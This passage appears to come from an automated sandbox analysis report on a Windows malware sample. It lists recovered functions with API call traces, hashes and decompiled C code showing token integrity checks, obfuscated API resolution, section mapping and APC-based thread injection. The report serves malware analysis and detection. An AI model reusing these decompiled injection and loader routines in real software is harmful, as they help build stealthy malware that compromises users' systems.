                              • Instruction Fuzzy Hash: F7317F75504311ABE3218F15C840B6BBBE8FFC8B54F044969FAC5AB281DB34E944CBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01039BAE, Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01022E31: memset.NTDLL ref: 01022E3B
                              • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,01028ECE,?,00000000), ref: 01039C48
                              • SetEvent.KERNEL32(00000000,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C55
                              • Sleep.KERNEL32(00000BB8,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C60
                              • ResetEvent.KERNEL32(00000000,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C67
                              • CloseHandle.KERNEL32(00000000,?,01028ECE,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01039C6E
                              • GetShellWindow.USER32 ref: 01039C79
                              • GetWindowThreadProcessId.USER32(00000000), ref: 01039C80
                                • Part of subcall function 010233D9: RegCloseKey.ADVAPI32(?,?,?), ref: 0102345C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                              • String ID:
                              • API String ID: 53838381-0
                              • Opcode ID: e87b9658d9e1739736f67562daa071ecf8f26d3c61032e5d8162643d8bc5ad3c
                              • Instruction ID: aa9f4c585fa619e49f77f974f9b7f0df4b8ec499185fcd83cb99f3a7a0449b5e
                              • Opcode Fuzzy Hash: e87b9658d9e1739736f67562daa071ecf8f26d3c61032e5d8162643d8bc5ad3c
                              • Instruction Fuzzy Hash: C121B676200318BBD3306766DD88EAF7BADABC5314F048008FACA87119CB7A5800CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4DCF, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E4DCF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x13ed294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E013E55DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E013E6DFA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                              0x013e4ddc
                              0x013e4de3
                              0x013e4dea
                              0x013e4dfe
                              0x013e4e09
                              0x013e4e21
                              0x013e4e2e
                              0x013e4e31
                              0x013e4e36
                              0x013e4e41
                              0x013e4e45
                              0x013e4e54
                              0x013e4e58
                              0x013e4e74
                              0x013e4e74
                              0x013e4e78
                              0x013e4e78
                              0x013e4e7d
                              0x013e4e81
                              0x013e4e87
                              0x013e4e88
                              0x013e4e8f
                              0x013e4e95

                              APIs
                              • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 013E4E01
                              • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 013E4E21
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 013E4E31
                              • CloseHandle.KERNEL32(00000000), ref: 013E4E81
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 013E4E54
                              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 013E4E5C
                              • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 013E4E6C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                              • String ID:
                              • API String ID: 1295030180-0
                              • Opcode ID: facfd7b3cb5ffb7114200b1188dde368d3e644f9965d3b321a16998f55a9585c
                              • Instruction ID: 087c284b833cda3210819df88e53df447a07df1684f3a70301f5bc6dd9f81659
                              • Opcode Fuzzy Hash: facfd7b3cb5ffb7114200b1188dde368d3e644f9965d3b321a16998f55a9585c
                              • Instruction Fuzzy Hash: DB212A75900319FFEB209F94DD48EEEBFBDEB48318F140065EA15A6190C7719A45DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01033B45, Relevance: 9.1, APIs: 6, Instructions: 123threadsynchronizationinjectionCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 01033B68
                                • Part of subcall function 010254B6: GetModuleHandleA.KERNEL32(?,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 010254D7
                                • Part of subcall function 010254B6: GetProcAddress.KERNEL32(00000000,?), ref: 010254F0
                                • Part of subcall function 010254B6: OpenProcess.KERNEL32(00000400,00000000,01033B88,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102550D
                                • Part of subcall function 010254B6: IsWow64Process.KERNEL32(00000000,00000000,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102551E
                                • Part of subcall function 010254B6: CloseHandle.KERNEL32(00000000,?,?,01033B88,00000000,010501F4,?,00000000), ref: 01025531
                              • ResumeThread.KERNEL32(?,?,?,CCCCFEEB,?,?,?,00000004,?,00000000,010501F4,?,00000000), ref: 01033C21
                              • WaitForSingleObject.KERNEL32(00000064), ref: 01033C2F
                              • SuspendThread.KERNEL32(?), ref: 01033C42
                                • Part of subcall function 0102D551: NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 0102D7CD
                                • Part of subcall function 0102D551: memset.NTDLL ref: 0102D7F5
                              • ResumeThread.KERNELBASE(?), ref: 01033CC4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Thread$HandleProcessResumememset$AddressCloseModuleObjectOpenProcSectionSingleSuspendUnmapViewWaitWow64
                              • String ID:
                              • API String ID: 664769717-0
                              • Opcode ID: 13ead783c3be1044422603efb52d327d5277074d0256264bda70b1ac9f661987
                              • Instruction ID: 2911591f04ff97732ca732facbd83a57b7e1c84e948c31e5f39217bc45610c0f
                              • Opcode Fuzzy Hash: 13ead783c3be1044422603efb52d327d5277074d0256264bda70b1ac9f661987
                              • Instruction Fuzzy Hash: 4641AE7190020DEFDB619F99CDC4AEEBBB9BB84300F0444A5F9959B150C735DA54CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6FB2, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 013E4176: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AD89D4,013E6FE2,?,?,?,?,?,?,?,?,?,?,?,013E6FE2), ref: 013E4242
                                • Part of subcall function 013E5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 013E5FAF
                                • Part of subcall function 013E5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 013E5FE0
                              • SysAllocString.OLEAUT32(00000000), ref: 013E700E
                              • SysAllocString.OLEAUT32(0070006F), ref: 013E7022
                              • SysAllocString.OLEAUT32(00000000), ref: 013E7034
                              • SysFreeString.OLEAUT32(00000000), ref: 013E7098
                              • SysFreeString.OLEAUT32(00000000), ref: 013E70A7
                              • SysFreeString.OLEAUT32(00000000), ref: 013E70B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                              • String ID:
                              • API String ID: 2831207796-0
                              • Opcode ID: 09cf850bcfe1eafca10cc51a52ff924fb69b57994604e46dc3e75215b90dc144
                              • Instruction ID: 8e16bc2de6f4d0d183e5c35db9c944a6971397214a2770824041bbc2d5659ac1
                              • Opcode Fuzzy Hash: 09cf850bcfe1eafca10cc51a52ff924fb69b57994604e46dc3e75215b90dc144
                              • Instruction Fuzzy Hash: 32311E36900619AFDB11DFBCC848A9EBFFAAF49314F144465EE10EB1A0DB719D05CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102C708, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(?,?,0104F4B4,00000000,?,0104C588,00000018,01043641,?,00000002,0104F518,00000003,0104F514,00000000,03AE75A8), ref: 0102C74B
                              • VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,03AE75A8,?,?,0104F4B4,00000000,?,0104C588,00000018,01043641), ref: 0102C7D6
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0102C7FE
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 0102C81C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                              • String ID:
                              • API String ID: 3666628472-0
                              • Opcode ID: 570480fb48b7584e875601f9a0ea344d312125c0945d9a72fe76e81f54df11df
                              • Instruction ID: 7fa5266a01c369ada9d0455704b9c10dd4fd1a7b801fc771fedff81f72d82728
                              • Opcode Fuzzy Hash: 570480fb48b7584e875601f9a0ea344d312125c0945d9a72fe76e81f54df11df
                              • Instruction Fuzzy Hash: 4B41C1B4A00715EFEB11DF69C980A9EBBF8FF48310B108569E586E7210C775E940CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01029704, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0102D660,?,?,01033C99,?,00000000), ref: 01029729
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0102974B
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01029761
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01029777
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0102978D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010297A3
                                • Part of subcall function 0103963A: NtCreateSection.NTDLL(01033C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 01039697
                                • Part of subcall function 0103963A: memset.NTDLL ref: 010396BB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: fc0fa0d6ad654896cf8a2c7c22046829ff658efafb53f47fd82c0f6e87478efe
                              • Instruction ID: 8237c5cdbd1c4dbe8e92b5ad70eea2f7dce5de6151b6f5e672a2d35a0856661f
                              • Opcode Fuzzy Hash: fc0fa0d6ad654896cf8a2c7c22046829ff658efafb53f47fd82c0f6e87478efe
                              • Instruction Fuzzy Hash: DB2128B560032AEFD760DF69D884E9B7BECFF08388B014566E985C7205E775E905CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6CE5, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E6CE5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E013E55DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x13ed2b8; // 0x26ea5a8
					_t1 = _t23 + 0x13ee11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x13ed2b8; // 0x26ea5a8
					_t2 = _t26 + 0x13ee782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E013E6DFA(_t54);
					} else {
						_t30 =  *0x13ed2b8; // 0x26ea5a8
						_t5 = _t30 + 0x13ee76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x13ed2b8; // 0x26ea5a8
							_t7 = _t33 + 0x13ee4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x13ed2b8; // 0x26ea5a8
								_t9 = _t36 + 0x13ee406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x13ed2b8; // 0x26ea5a8
									_t11 = _t39 + 0x13ee792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E013E7562(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                              0x013e6cf4
                              0x013e6cf8
                              0x013e6dba
                              0x013e6cfe
                              0x013e6cfe
                              0x013e6d03
                              0x013e6d16
                              0x013e6d18
                              0x013e6d1d
                              0x013e6d25
                              0x013e6d2c
                              0x013e6d30
                              0x013e6d33
                              0x013e6db2
                              0x013e6db3
                              0x013e6d35
                              0x013e6d35
                              0x013e6d3a
                              0x013e6d42
                              0x013e6d46
                              0x013e6d49
                              0x00000000
                              0x013e6d4b
                              0x013e6d4b
                              0x013e6d50
                              0x013e6d58
                              0x013e6d5c
                              0x013e6d5f
                              0x00000000
                              0x013e6d61
                              0x013e6d61
                              0x013e6d66
                              0x013e6d6e
                              0x013e6d72
                              0x013e6d75
                              0x00000000
                              0x013e6d77
                              0x013e6d77
                              0x013e6d7c
                              0x013e6d84
                              0x013e6d88
                              0x013e6d8b
                              0x00000000
                              0x013e6d8d
                              0x013e6d93
                              0x013e6d98
                              0x013e6d9f
                              0x013e6da6
                              0x013e6da9
                              0x00000000
                              0x013e6dab
                              0x013e6dae
                              0x013e6dae
                              0x013e6da9
                              0x013e6d8b
                              0x013e6d75
                              0x013e6d5f
                              0x013e6d49
                              0x013e6d33
                              0x013e6dc8

                              APIs
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,013E87BD,?,?,?,?,00000000,00000000), ref: 013E6D0A
                              • GetProcAddress.KERNEL32(00000000,7243775A), ref: 013E6D2C
                              • GetProcAddress.KERNEL32(00000000,614D775A), ref: 013E6D42
                              • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 013E6D58
                              • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 013E6D6E
                              • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 013E6D84
                                • Part of subcall function 013E7562: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,013E6DA4), ref: 013E75BF
                                • Part of subcall function 013E7562: memset.NTDLL ref: 013E75E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: d262b4208c0edf3853461b84df0ecf64c391637621053570540b8872f125a62d
                              • Instruction ID: 2dfaac3ec52a2baf17f87068237eb48f7939160451d65c8778286bd7fae5178d
                              • Opcode Fuzzy Hash: d262b4208c0edf3853461b84df0ecf64c391637621053570540b8872f125a62d
                              • Instruction Fuzzy Hash: 6B2151B150031A9FDB60DF68C849EAB7BFCEB14358B044529E509CB2D4D771E9498F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01023475, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                              Download Yara Rule
                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,00000000,?,010501F8,010210B6), ref: 0102348C
                              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 010234A1
                              • GetLastError.KERNEL32(00000000), ref: 010234AC
                              • TerminateThread.KERNEL32(00000000,00000000), ref: 010234B6
                              • CloseHandle.KERNEL32(00000000), ref: 010234BD
                              • SetLastError.KERNEL32(00000000), ref: 010234C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                              • String ID:
                              • API String ID: 3832013932-0
                              • Opcode ID: 01d28198ab4a86cf29940c99112759638805e124e2f3c858501bdffc57a8bca0
                              • Instruction ID: 6b66ffeb4d9effe5b5ccbf53669c45cac18082790f4700d9d21177106e758a8e
                              • Opcode Fuzzy Hash: 01d28198ab4a86cf29940c99112759638805e124e2f3c858501bdffc57a8bca0
                              • Instruction Fuzzy Hash: EBF012BA786321FFE7325FA4AD88F5F7F69FB09791F004405F68696168C72E48108B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E48E5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 88%
                              			E013E48E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x13ed36c);
					_t91 = 0x80000002;
					L6:
					_t59 = E013E65F6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E013E691B(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E013E6DFA(_a8);
						goto L29;
					}
					_t64 =  *0x13ed2b0; // 0x3ad9b78
					_t16 = _t64 + 0xc; // 0x3ad9c46
					_t65 = E013E65F6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d013ec0, executed
						_t67 = E013E6E41(_t97,  *_t33, _t91, _a8,  *0x13ed364,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x13ed2b8; // 0x26ea5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x13eea23; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x13ee8cb; // 0x55434b48
								_t69 = _t34;
							}
							if(E013E5D44(_t69,  *0x13ed364,  *0x13ed368,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x13ed2b8; // 0x26ea5a8
									_t44 = _t71 + 0x13ee83e; // 0x74666f53
									_t73 = E013E65F6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d013ec0
										E013E4FA0( *_t47, _t91, _a8,  *0x13ed368, _a24);
										_t49 = _t101 + 0x10; // 0x3d013ec0
										E013E4FA0( *_t49, _t91, _t99,  *0x13ed360, _a16);
										E013E6DFA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d013ec0
									E013E4FA0( *_t40, _t91, _a8,  *0x13ed368, _a24);
									_t43 = _t101 + 0x10; // 0x3d013ec0, executed
									E013E4FA0( *_t43, _t91, _a8,  *0x13ed360, _a16); // executed
								}
								if( *_t101 != 0) {
									E013E6DFA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d013ec0, executed
					_t81 = E013E5607( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d013ec0
							E013E6E41(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E013E6DFA(_t100);
						_t98 = _a16;
					}
					E013E6DFA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E013EAA99(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x13ed36c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                              0x013e48e5
                              0x013e48ee
                              0x013e48f5
                              0x013e48fa
                              0x013e4967
                              0x013e496d
                              0x013e4972
                              0x013e4979
                              0x013e4980
                              0x013e4983
                              0x013e4aee
                              0x013e4af5
                              0x013e4af5
                              0x013e4afa
                              0x013e4afc
                              0x013e4afc
                              0x013e4b05
                              0x013e4b05
                              0x013e4989
                              0x013e498e
                              0x013e4995
                              0x013e4ae4
                              0x013e4ae7
                              0x00000000
                              0x013e4ae7
                              0x013e499b
                              0x013e49a0
                              0x013e49a3
                              0x013e49aa
                              0x013e49ad
                              0x013e49f6
                              0x013e49f6
                              0x013e4a09
                              0x013e4a0c
                              0x013e4a13
                              0x013e4a1b
                              0x013e4a20
                              0x013e4a2a
                              0x013e4a2a
                              0x013e4a22
                              0x013e4a22
                              0x013e4a22
                              0x013e4a22
                              0x013e4a4c
                              0x013e4a54
                              0x013e4a82
                              0x013e4a87
                              0x013e4a8e
                              0x013e4a93
                              0x013e4a97
                              0x013e4ac9
                              0x013e4a99
                              0x013e4aa6
                              0x013e4aa9
                              0x013e4ab9
                              0x013e4abc
                              0x013e4ac2
                              0x013e4ac2
                              0x013e4a56
                              0x013e4a63
                              0x013e4a66
                              0x013e4a78
                              0x013e4a7b
                              0x013e4a7b
                              0x013e4ad3
                              0x013e4adf
                              0x013e4ad5
                              0x013e4ad8
                              0x013e4ad8
                              0x013e4ad3
                              0x013e4a4c
                              0x00000000
                              0x013e4a13
                              0x013e49bc
                              0x013e49bf
                              0x013e49c6
                              0x013e49cc
                              0x013e49cf
                              0x013e49d1
                              0x013e49dd
                              0x013e49e0
                              0x013e49e0
                              0x013e49e6
                              0x013e49eb
                              0x013e49eb
                              0x013e49f1
                              0x00000000
                              0x013e49f1
                              0x013e48ff
                              0x00000000
                              0x013e4926
                              0x013e4926
                              0x013e4932
                              0x013e4945
                              0x013e494b
                              0x013e4953
                              0x00000000
                              0x013e4953

                              APIs
                              • StrChrA.SHLWAPI(013E6096,0000005F,00000000,00000000,00000104), ref: 013E4918
                              • lstrcpy.KERNEL32(?,?), ref: 013E4945
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                                • Part of subcall function 013E4FA0: lstrlenW.KERNEL32(?,?,?,013E4AAE,3D013EC0,80000002,013E6096,013EA6E1,74666F53,4D4C4B48,013EA6E1,?,3D013EC0,80000002,013E6096,?), ref: 013E4FC5
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • lstrcpy.KERNEL32(?,00000000), ref: 013E4967
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                              • String ID: ($\
                              • API String ID: 3924217599-1512714803
                              • Opcode ID: e1652a73f3ed3554c84ffb21c99547e6ecf5c18b481c1e30520fdd37acb2acd4
                              • Instruction ID: 1d4f0f268916bc938dd7f9b355878a8804210e7f4c6d54e0ffb21cb00eed82b0
                              • Opcode Fuzzy Hash: e1652a73f3ed3554c84ffb21c99547e6ecf5c18b481c1e30520fdd37acb2acd4
                              • Instruction Fuzzy Hash: A951397510031AEFEF229FA8DC48EAA7BFDFB18318F004115FA25AA1E4D731D9659B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010315C8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37threadCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010315E7
                                • Part of subcall function 01038E6E: RtlEnterCriticalSection.NTDLL(00000000), ref: 01038E7A
                                • Part of subcall function 01038E6E: CloseHandle.KERNEL32(?), ref: 01038E88
                                • Part of subcall function 01038E6E: RtlLeaveCriticalSection.NTDLL(00000000), ref: 01038EA4
                              • CloseHandle.KERNEL32(?), ref: 010315F5
                              • InterlockedDecrement.KERNEL32(010500BC), ref: 01031604
                                • Part of subcall function 01042501: SetEvent.KERNEL32(00000760,0103161F), ref: 0104250B
                                • Part of subcall function 01042501: CloseHandle.KERNEL32(00000760), ref: 01042520
                                • Part of subcall function 01042501: HeapDestroy.KERNELBASE(04740000), ref: 01042530
                              • RtlExitUserThread.NTDLL(00000000), ref: 01031620
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                              • String ID: t
                              • API String ID: 1141245775-2238339752
                              • Opcode ID: a268d3b93e075b84438e0c83f85540f14721c7f12238225318327f66aaba93ea
                              • Instruction ID: 9cc3c66e6948da37caaeaf17abb251a4db671eb4dd1ac0e166854dd5d7e7beca
                              • Opcode Fuzzy Hash: a268d3b93e075b84438e0c83f85540f14721c7f12238225318327f66aaba93ea
                              • Instruction Fuzzy Hash: 6CF0C874680300ABD7625F68CD45E9F3B6CEB49770F100258F9A6871C4DB7949018BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

